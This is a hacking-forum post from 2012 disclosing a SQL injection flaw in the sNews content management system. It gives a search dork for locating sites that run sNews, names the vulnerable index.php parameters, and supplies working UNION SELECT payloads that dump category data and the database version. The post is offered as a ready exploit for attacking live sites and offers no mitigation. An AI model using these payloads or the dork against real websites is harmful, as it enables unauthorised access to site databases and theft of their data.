.:: Blackc0de Forum ::.
Would you like to react to this message? Create an account in a few clicks or log in to continue.

-=Explore The World From Our Binary=-
 
HomeIndeksLatest imagesPendaftaranLogin

 

 sNews (index.php) SQL Injection Vulnerability

Go down 
PengirimMessage
Reza Saputra
NuuBiiTooL
NuuBiiTooL



Jumlah posting : 24
Points : 66
Reputation : 2
Join date : 10.01.12

sNews (index.php) SQL Injection Vulnerability Empty
PostSubyek: sNews (index.php) SQL Injection Vulnerability   sNews (index.php) SQL Injection Vulnerability Icon_minitimeTue Jan 10, 2012 9:02 pm

# Software Link: http://snews.awddesign.co.uk
# Version: N/A
# Tested on: Wnidows xp SP2
# CVE : N/A
Dork: "Powered by sNews"
===================================================

[+] Vulnerable File :
http://www.Victime.com/sNews/index.php?id=

[+] ExploiT :
-82/**/union/**/select/**/1,concat%28published,0x3a,name%29,3,4,5,6,7,8,9,10,11+from+categories--

http://localhost/[path]/index.php?category=-3 union select 0,version(),2,3,4,5,6,7,8
====================================================
Kembali Ke Atas Go down
 
sNews (index.php) SQL Injection Vulnerability
Kembali Ke Atas 
Halaman 1 dari 1

Permissions in this forum:Anda tidak dapat menjawab topik
.:: Blackc0de Forum ::. :: Information Technology :: Exploits-
Navigasi: